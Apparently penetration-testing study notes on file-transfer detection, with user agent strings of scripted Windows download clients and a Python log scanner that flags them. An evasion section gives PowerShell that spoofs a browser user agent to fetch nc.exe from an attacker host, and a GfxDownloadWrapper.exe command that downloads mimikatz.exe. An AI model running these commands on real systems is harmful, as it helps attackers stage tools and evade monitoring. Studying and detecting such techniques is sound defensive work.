# Detection
- command-line detection based on blacklisting can be easy to bypass with obfuscation techniques
- command-line detection based on whitelisting is much harder to bypass
- malicious file transfers can be recognized based on user agent strings
- HTTP clients can be recognized by their user agent string
- examples: firefox, chrome, sqlmap, nmap, curl
- tool for user agent string identification: [UserAgentString.com](https://useragentstring.com/index.php)
- list of user agent strings: [UserAgentString.com - List of User Agent Strings](https://useragentstring.com/pages/useragentstring.php)
```
#example user agent strings shown from server perspective
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.0 #Invoke-WebRequest client
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) #WinHttpRequest client
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E) #Msxml2 client
User-Agent: Microsoft-CryptoAPI/10.0 #CertUtil client
User-Agent: Microsoft BITS/7.8 #BITS client
```
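As an added example (not part of the original notes), the user agent signatures above turned into detection logic over web server access logs. The log lines and client labels are constructed; the user agent strings are the ones listed in the notes, and the Msxml2 match is flagged as lower confidence because IE in compatibility view sends the same string.

```python
import re
from typing import List, Optional, Tuple

# Signatures for the scripted-download clients listed above, matched against the
# raw User-Agent value. More specific tokens come first.
CLIENT_SIGNATURES = [
    ("PowerShell Invoke-WebRequest", re.compile(r"\bWindowsPowerShell/")),
    ("WinHttpRequest COM object", re.compile(r"\bWinHttp\.WinHttpRequest\.")),
    ("CertUtil", re.compile(r"^Microsoft-CryptoAPI/")),
    ("BITS", re.compile(r"^Microsoft BITS/")),
    # Msxml2.XMLHTTP borrows the IE user agent: "MSIE 7.0" next to the IE11 engine
    # token "Trident/7.0" is a compat-view string, which IE11 itself can also send.
    ("Msxml2 or IE compat mode", re.compile(r"MSIE 7\.0;.*Trident/7\.0")),
]

# Apache/nginx "combined" log format; the last quoted field is the User-Agent.
COMBINED_LOG = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"'
)


def classify_user_agent(ua: str) -> Optional[str]:
    """Return the client label for a known scripted-download UA, else None."""
    for label, pattern in CLIENT_SIGNATURES:
        if pattern.search(ua):
            return label
    return None


def scan_access_log(lines: List[str]) -> List[Tuple[str, str, str, str]]:
    """Return (client_ip, method, path, label) for every flagged request."""
    hits = []
    for line in lines:
        m = COMBINED_LOG.match(line)
        if m is None:
            continue  # not combined format; leave it for another parser
        ip, method, path, _status, ua = m.groups()
        label = classify_user_agent(ua)
        if label is not None:
            hits.append((ip, method, path, label))
    return hits


# Constructed sample log: one browser request followed by two scripted fetches.
SAMPLE_LOG = [
    '10.0.0.7 - - [01/Jan/2024:09:00:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0"',
    '10.0.0.9 - - [01/Jan/2024:09:00:05 +0000] "GET /nc.exe HTTP/1.1" 200 59392 "-" '
    '"Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.0"',
    '10.0.0.9 - - [01/Jan/2024:09:00:09 +0000] "GET /a.txt HTTP/1.1" 200 12 "-" '
    '"Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"',
]
```

Because this is a blocklist on a client-controlled header, it only catches default user agents; pairing it with an allowlist of the browsers actually deployed in the environment is the stronger check.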
# Evading Detection
- some administrators or defenders may blacklist user agents
- however, as one example, `Invoke-WebRequest` contains a UserAgent parameter, which allows for changing the default user agent to one emulating IE, Firefox, Chrome, Opera, or Safari
```powershell
[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl #list user agents
```
```powershell
#Invoking Invoke-WebRequest to download nc.exe using a Chrome User Agent
$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
Invoke-WebRequest http://<kali_host_ip>/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"
```
## LOLBAS / GTFOBins
- Application whitelisting may prevent you from using PowerShell or Netcat, and command-line logging may alert defenders to your presence
- Here one option may be to use a "LOLBIN" (living off the land binary) aka "misplaced trust binaries"
- Example LOLBIN: `GfxDownloadWrapper.exe` (Intel Graphics Driver for Windows 10), which is installed on some systems to download configuration files periodically
```powershell
GfxDownloadWrapper.exe "http://<kali_host_ip>/mimikatz.exe" "C:\Windows\Temp\mimikatz.exe"
```